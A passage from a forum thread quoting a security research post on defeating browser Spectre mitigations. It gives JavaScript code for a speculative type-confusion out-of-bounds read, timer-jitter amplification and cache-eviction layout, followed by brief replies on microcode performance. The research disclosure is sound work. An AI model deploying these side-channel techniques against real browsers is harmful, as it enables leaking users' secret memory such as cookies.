    0x2b40db1d22a5 125 c6041864 movb [rax+rbx*1],0x64 <--this inserts the relevant entry of probeArr into the CPU cache based on the secret value inside the speculative execution, so we can query the probeArr later to see which entry is in the CPU cache

    ...


    In this code we have the function spectre(), which we call many times. It receives a single parameter, and since we always call it with an object of type LargeClass, that type gets recorded in the function’s feedback vector and TurboFan then compiles the function to handle this type specifically.

    At the beginning of the function, the parameter’s hidden class pointer (the parameter's type) is compared against the known, fixed pointer of the LargeClass hidden class. If there is a match, execution continues; if not, the TurboFan-compiled code bails out and an unoptimized execution of the function takes place.

    If the parameter’s hidden class pointer is not in the CPU cache and we pass an object of type SmallClass, speculative execution can continue until the CPU realizes it is the wrong hidden class. Inside the speculative branch, a large offset from the beginning of the object is read (out-of-bounds for objects of type SmallClass).

    This out-of-bounds data is then used as an index into the probe array, and the Spectre exploit continues by timing accesses to the different probe array slots to determine which one is in the CPU cache.

    This approach might not get us very far past the object, since beyond a certain object size the in-memory layout changes and this method is no longer applicable. That said, it is still an out-of-bounds memory read.

    Another note: before executing the spectre() function we must ensure three things. First, the hidden class pointer of the object passed to the function must not be cached, so that speculative execution will start. Second, the secret data being read must be in the CPU cache (for example, by loading a new resource from a domain so its cookie is brought into the CPU cache), so that execution can reach the probe array access before the speculative execution terminates. Third, the probe array must be entirely out of the CPU cache, so that only one entry will be cached after the function call.

    In a real exploit, the probe array slots that are used will be further apart, to prevent cache prefetching from inserting multiple slots into the CPU cache at once.

    This code is not presented in the POC, since it is harder to demonstrate the result with this technique: Javascript doesn’t allow access to the secret data, so it’s impossible to compare it with the results we got from the Spectre exploit. The success of the exploit can be examined manually by attaching a debugger to the process right after executing the exploit and dumping the process memory.
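    To make the type-confusion flow above concrete, here is a minimal sketch of what the Javascript side could look like. The class shapes, field counts, and training loop are assumptions for illustration (the original PoC source is not included in this excerpt); only the overall structure (train the feedback vector with LargeClass, then call with SmallClass) follows the description above.

    ```javascript
    // Hypothetical sketch: names and field layouts are illustrative assumptions.
    class SmallClass {
        constructor() { this.m1 = 0; }  // small object: a large field offset is out of bounds
    }

    class LargeClass {
        constructor() {
            // Enough in-object fields that m53 sits at a large fixed offset.
            for (let i = 1; i <= 64; i++) this['m' + i] = 0;
        }
    }

    const probeArr = new Uint8Array(256);

    function spectre(obj) {
        // TurboFan specializes this for LargeClass after enough "training" calls.
        // When later called with a SmallClass object whose hidden class pointer is
        // not cached, the load of obj.m53 executes speculatively out of bounds.
        probeArr[obj.m53 % 256] = 100;
    }

    // Train the type feedback with the expected type...
    const large = new LargeClass();
    for (let i = 0; i < 100000; i++) spectre(large);

    // ...then call with the wrong type to trigger the speculative OOB read.
    spectre(new SmallClass());
    ```

    After the mistrained call, the attacker would time accesses to probeArr slots to find the one the speculative write pulled into the cache.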

    A few notes about the Site-isolation mitigation
    This mitigation is very effective, but potentially very challenging to implement correctly: it can have performance and functionality issues, and developers must actively maintain different data types in the correct process.

    Another issue is that per-domain data that is not meant to be accessed by Javascript, such as HttpOnly cookies, still has the potential of being exposed.

    Overcoming the data timing mitigations with a low resolution and jittered timer
    The techniques explained here are implemented in our POC.

    We also implemented a very precise timer for Chromium to debug our code with. The patch for this timer is also available here.

    Here we will focus on how to detect cache effects from speculative branches with low resolution and jittered timers.

    Let’s consider the following code:

    lastTick = performance.now();
    while (lastTick == (curTick = performance.now()));

    The code above busy-loops until the exact moment we hit a new tick in performance.now(). (Between ticks of the low resolution, jittered clock, performance.now() returns exactly the same value.)

    Now let’s add some code that executes exactly when the clock has ticked:

    lastTick = performance.now();
    while (lastTick == (curTick = performance.now()));

    for (var i = 0; i < ITER_COUNT; i++) {
        globalVar++;
    }

    globalVar = probeArr[index];

    if (performance.now() == curTick) {
        //The access to probeArr[index] is a cache hit
    } else {
        //The access to probeArr[index] is a cache miss
    }

    If we had no jitter and performance.now() were a small, constant-time function, we could compute the time it takes to execute globalVar++ on a specific processor. Then, we would adjust the value of ITER_COUNT so that the next performance.now() after the probeArr[index] access lands in the next tick on a cache miss, and stays in the current tick on a cache hit.

    time:
    --------------------------------------------------------------------------
    |         |                      |----------|            |----------|
    |         |                      |probeArr  |            |probeArr  |
    |         |                      |access,   |            |access,   |
    |---------|----------------------|cache     |            |cache     |
    |wait for |ITER_COUNT            |hit       |            |miss      |
    |tick     |busy loop             |----------|            |----------|
    --------------------------------------------------------------------------
    tick |                                tick |                        tick |
    performance.now()              performance.now()           performance.now()
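    The calibration step above is not spelled out in this excerpt, but it could be sketched as follows: count how many globalVar++ iterations fit between two consecutive ticks, and derive ITER_COUNT from that. The helper name and the averaging over 10 samples are assumptions for illustration.

    ```javascript
    // Hypothetical calibration sketch (not from the original PoC).
    let globalVar = 0;

    function incrementsPerTick() {
        let lastTick = performance.now(), curTick;
        // Align to a tick edge first.
        while (lastTick === (curTick = performance.now()));
        lastTick = curTick;
        let count = 0;
        // Count increments until the clock ticks again.
        while (lastTick === performance.now()) {
            globalVar++;
            count++;
        }
        return count;
    }

    // Average several samples to smooth out scheduling noise.
    const samples = [];
    for (let i = 0; i < 10; i++) samples.push(incrementsPerTick());
    const perTick = samples.reduce((a, b) => a + b, 0) / samples.length;
    // ITER_COUNT would then be chosen slightly below perTick, so that the
    // probe access lands just before the tick boundary.
    ```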

    This method works fine if performance.now() executes in constant time and there is no jitter, but that isn’t the case with the current Spectre mitigations. To overcome this, we can first shrink the probe array to only 2 slots (one for bit value 0 and one for bit value 1) and read the out-of-bounds data bit by bit. We can then query the probe array for each secret bit multiple times, so that on average we get the true result for that bit.

    This method could take an unreasonable amount of time to execute for each bit, due to performance.now() execution time overhead and timer jitter noise.

    To solve this, we needed an approach that amplifies the cache miss/hit difference: many cache misses or hits, i.e. many cached or uncached probe array slots, for each queried bit. This can be achieved by executing the speculative execution function multiple times per bit, each time inserting a new slot of the probe array into the CPU cache. To retrieve the secret bit, we can then execute code such as the following:

    lastTick = performance.now();
    while (lastTick == (curTick = performance.now())); lastTick = curTick;

    for (var i = 0; i < SLOT_COUNT; i++) {
        globalVar += probeArrBitValueZero[i];
    }

    var zeroCount = 0;

    while (performance.now() == curTick) {
        zeroCount++;
    }

    lastTick = performance.now();
    while (lastTick == (curTick = performance.now())); lastTick = curTick;

    for (var i = 0; i < SLOT_COUNT; i++) {
        globalVar += probeArrBitValueOne[i];
    }

    var oneCount = 0;

    while (performance.now() == curTick) {
        oneCount++;
    }

    if (oneCount > zeroCount) {
        //probeArrBitValueOne slots were cached and accessed faster, so the count is higher and the secret bit value is 1
    } else {
        //probeArrBitValueZero slots were cached and accessed faster, so the count is higher and the secret bit value is 0
    }

    This code didn’t provide the desired results: the memory fetches from the probe array were executed out of order and in parallel by the CPU, so we didn’t get the wanted amplification. To overcome this, we assigned each slot in the probe arrays the index of the next slot, like this:

    for (var i = 0; i < SLOT_COUNT; i++) {
        probeArrBitValueZero[i] = i + 1;
    }
    for (var i = 0; i < SLOT_COUNT; i++) {
        probeArrBitValueOne[i] = i + 1;
    }

    The query code was changed to:

    lastTick = performance.now();
    while (lastTick == (curTick = performance.now())); lastTick = curTick;

    var index = 0;

    for (var i = 0; i < SLOT_COUNT; i++) {
        // Iterations are ensured to perform in order, not simultaneously,
        // since each iteration depends on the result of the previous one.
        index = probeArrBitValueZero[index];
    }
    globalVar += index;

    var zeroCount = 0;

    while (performance.now() == curTick) {
        zeroCount++;
    }

    lastTick = performance.now();
    while (lastTick == (curTick = performance.now())); lastTick = curTick;

    index = 0;
    for (var i = 0; i < SLOT_COUNT; i++) {
        // Iterations are ensured to perform in order, not simultaneously,
        // since each iteration depends on the result of the previous one.
        index = probeArrBitValueOne[index];
    }
    globalVar += index;

    var oneCount = 0;

    while (performance.now() == curTick) {
        oneCount++;
    }

    if (oneCount > zeroCount) {
        //probeArrBitValueOne slots were cached and accessed faster, so the count is higher and the secret bit value is 1
    } else {
        //probeArrBitValueZero slots were cached and accessed faster, so the count is higher and the secret bit value is 0
    }

    This way, out of order fetches are not possible as the CPU can’t know the next address to be fetched before completing the previous fetch.

    Using this approach together with performing the test multiple times for each bit and taking the average as the final result, we were able to read secret bits successfully.
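    The per-bit averaging described above could be sketched as a simple majority vote over many noisy measurements. The helper readBitOnce() below is a placeholder standing in for one tick-aligned oneCount/zeroCount measurement from the previous listing; its body (a biased random stub) is an assumption purely so the sketch is self-contained.

    ```javascript
    // Placeholder for one noisy measurement round: in the real PoC this would
    // run the speculative execution function SLOT_COUNT times and compare
    // oneCount against zeroCount. Stubbed here as a 90%-reliable read.
    function readBitOnce(bitIndex) {
        return Math.random() < 0.9 ? 1 : 0;
    }

    function readBit(bitIndex, rounds) {
        let ones = 0;
        for (let i = 0; i < rounds; i++) ones += readBitOnce(bitIndex);
        // Majority vote over many noisy measurements recovers the true bit.
        return ones * 2 >= rounds ? 1 : 0;
    }
    ```

    With a per-round accuracy well above 50%, a few dozen rounds per bit drive the error rate down rapidly, at the cost of the roughly 1 bit per second bandwidth reported below.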

    To implement this approach, we had to make sure that the probe arrays for bit value 1 and bit value 0 did not share cache sets, and that accessing one slot would not prefetch any other slot. To achieve this, we used a single large array, with different index ranges inside it serving as sub-arrays. Each slot was placed a page apart from the previous slot, to prevent prefetches and to make sure it is not in the same cache set (address bits 13 and above differ). Each new sub-array begins at an offset of 1/4 page from the end of the last page of the previous sub-array’s last slot. This way the slots of each sub-array differ in address bits 10-11, so they use different cache sets.

    Main Array:
    ----------------------------------------------------------------------------
    |Sub-array0                     |1024 Bytes|Sub-array1                      |
    |-------------------------------|(1/4 Page)|--------------------------------|
    | Page0    | Page1    |         |          | Page0    | Page1    |          |
    | -------  | -------  |         |          | -------  | -------  |          |
    | |Slot0|  | |Slot1|  | ...     |          | |Slot0|  | |Slot1|  | ...      |
    ---------------------------------------------------------------------------- ...

    To flush the cache before each test of the 2 probe sub-arrays, we used another, much larger sub-array, and accessed it at indices whose address bits 10-12 match those of the 2 probe sub-arrays’ slots. We constructed it such that, if the main array occupied contiguous, non-fragmented physical memory, these accesses would use the same cache sets as the probe array slots.
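    The index arithmetic behind that layout could be sketched as follows, assuming 4096-byte pages and a Uint8Array backing store. The concrete constants (SLOT_COUNT, base offsets) are illustrative assumptions, not values taken from the original PoC.

    ```javascript
    // Sketch of the sub-array layout described above (constants are assumptions).
    const PAGE = 4096;
    const SLOT_COUNT = 64;

    // Each slot sits one page after the previous, so slots never share a cache
    // line or trigger adjacent-line prefetch, and address bits 13+ differ.
    function slotIndex(subArrayBase, slot) {
        return subArrayBase + slot * PAGE;
    }

    // Sub-array 1 starts 1/4 page (1024 bytes) past the end of sub-array 0's
    // last page, so its slots differ in address bits 10-11 and land in
    // different cache sets.
    const sub0Base = 0;
    const sub1Base = slotIndex(sub0Base, SLOT_COUNT) + PAGE / 4;

    const mainArr = new Uint8Array(slotIndex(sub1Base, SLOT_COUNT) + PAGE);

    // Touching slot 3 of sub-array 0:
    mainArr[slotIndex(sub0Base, 3)] = 1;
    ```

    The much larger eviction sub-array described above would then be accessed at indices sharing these slots’ low address bits, to push the probe slots out of their cache sets before each measurement.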

    Implications
    In this presented research we were able to show that even with the implemented Spectre mitigations, we were able to:
    1. Read speculatively accessed memory in Chrome at around 1 bit per second.

    2. Read accessed memory in Edge (not speculatively accessed) at around 1 bit per second.

    3. Read accessed memory in Safari (not speculatively accessed) at around 1 bit per second.
    We were not able to use these techniques in Firefox, as they recently reduced the timer resolution to 2ms. The technique presented here is potentially relevant even at this timer resolution, but some parameter tweaking would be required.

    This is not a full exploit, but a POC of overcoming some of the browsers’ Spectre mitigations.

    In the POC we didn’t implement the technique for accessing out-of-bounds data that works despite the index masking mitigations. However, it should work using code similar to what was presented in this post.

    Microsoft did not list the index masking mitigation on its mitigations page, which might mean that this technique could be used in Edge to access any memory address in the browser’s address space, giving arbitrary read access to any such address.

    Further research
    This read bandwidth could potentially be improved by tweaking the code and parameters. Other, better methods for accessing out-of-bounds data that work with the Spectre mitigations in place could also improve the effectiveness of this POC.
    Conclusions
    This research shows that while the timing mitigations implemented in different browsers are effective at dramatically slowing down Spectre-like attacks, they are not effective at preventing them. More robust solutions are therefore required, such as site-isolation and index masking. These timing mitigations hurt performance and functionality for some web applications; given their limited effectiveness, reverting them should be considered."
     
    Last edited: Jul 2, 2018
  6. Vasudev

    Vasudev Notebook Prophet

    Reputations:
    3,290
    Messages:
    6,323
    Likes Received:
    4,128
    Trophy Points:
    431
    So, like CERT said, replacing hardware is cheaper than SW sh**.
    I bet Intel ousted its ex-CEO for this reason alone!
    I reckon Intel won't recall all their faulty products, even 2-decade-old chips, for Ryzen TR.
     
    hmscott likes this.
  7. Robbo99999

    Robbo99999 Notebook Prophet

    Reputations:
    3,211
    Messages:
    5,559
    Likes Received:
    4,118
    Trophy Points:
    431
    That's not too bad then, you can turn on Strict Site Isolation on Chrome web browser, it just uses a little more RAM, but performance is OK I've found.
     
    hmscott likes this.
  8. Robbo99999

    Robbo99999 Notebook Prophet

    Reputations:
    3,211
    Messages:
    5,559
    Likes Received:
    4,118
    Trophy Points:
    431
    Damn, so both my Sandybridge CPU in my laptop & my Skylake CPU in my desktop are gonna be getting another new 'Spectre-protected' microcode - wonder how much performance hit this one will have this time around! My Skylake CPU saw a 3% drop in performance using C2 microcode in worst case, but how much extra performance hit from using the C6 microcode that is due to come out soon (perhaps it will be released through Microsoft again).
     
    hmscott likes this.
  9. Vasudev

    Vasudev Notebook Prophet

    Reputations:
    3,290
    Messages:
    6,323
    Likes Received:
    4,128
    Trophy Points:
    431
    On the C6 microcode for Skylake, matters are worse.
     
    hmscott likes this.
  10. Robbo99999

    Robbo99999 Notebook Prophet

    Reputations:
    3,211
    Messages:
    5,559
    Likes Received:
    4,118
    Trophy Points:
    431
    Well that wouldn't surprise me that performance would be worse with C6 microcode. Have you got some links you can show me re performance of C6 microcode?
     
    Vasudev likes this.